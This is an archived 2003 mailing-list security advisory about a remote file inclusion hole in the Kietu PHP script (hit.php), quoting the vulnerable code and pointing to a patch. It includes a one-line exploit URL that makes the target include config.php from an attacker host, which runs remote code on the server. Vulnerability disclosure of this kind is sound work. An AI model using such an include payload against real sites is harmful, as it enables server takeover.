[VulnWatch] Kietu ( PHP )

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/15/03

  • Next message: Frog Man: "[VulnWatch] D-Forum (PHP)"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sat, 15 Feb 2003 10:38:40 +0100
    
    

    Informations :
    같같같같같같같
    Website : http://kietu.free.fr
    Version : 2.0, 2.3
    Problem : Include file

    PHP Code/Location :
    같같같같같같같같같
    hit.php :
    ------------------------------------------------------------------
    if (!get_cfg_var("register_globals")) {
    $kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"];
    $kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"];
    $kietu["website"] = $HTTP_GET_VARS["website"];
    $kietu["appel"] = $HTTP_GET_VARS["appel"];
    $kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"];
    $kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"];
    $kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit;
    }
    else {
    $kietu["remote_addr"] = $REMOTE_ADDR;
    $kietu["http_user_agent"] = $HTTP_USER_AGENT;
    $kietu["website"] = $website;
    $kietu["appel"] = $appel;
    $kietu["http_referer"] = $HTTP_REFERER;
    $kietu["php_self"] = $PHP_SELF;
    $kietu["url_hit"] = $url_hit;
    }

    require ($kietu["url_hit"]."config.php");
    ------------------------------------------------------------------

    Exploit :
    같같같같
    http://[target]/hit.php?url_hit=http://[attacker]/
    with :
    http://[attacker]/config.php

    Patch :
    같같같
    A patch can be found on http://www.phpsecure.org

    More details :
    같같같같같같같
    In French :
    http://www.frog-man.org/tutos/5holes8.txt

    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools2:32:34 +0100 (CET)

    This hole was published in "the Hackademy Journal 01", october 2002
    (http://www.dmpfrance.com).

    frog-m@n

    _________________________________________________________________
    MSN Search, le moteur de recherche qui pense comme vous !
    http://search.fr.msn.be



    Relevant Pages

    • Web Server Creator - Web Portal 0.1 (PHP)
      ... Website: http://webcreator.com02.com ... PHP Code/Location: ... le moteur de recherche qui pense comme vous! ...
      (Bugtraq)
    • Kietu ( PHP )
      ... Website: http://kietu.free.fr ... le moteur de recherche qui pense comme vous! ...
      (Bugtraq)
    • Pentium 100Mhz New User
      ... sure to configure my computer correclty. ... le moteur de recherche qui pense comme vous! ...
      (Debian-User)
    • Re: quota disk with redhat8
      ... there are 2 quota formats, an old one and a new one ... le moteur de recherche qui pense comme vous! ...
      (RedHat)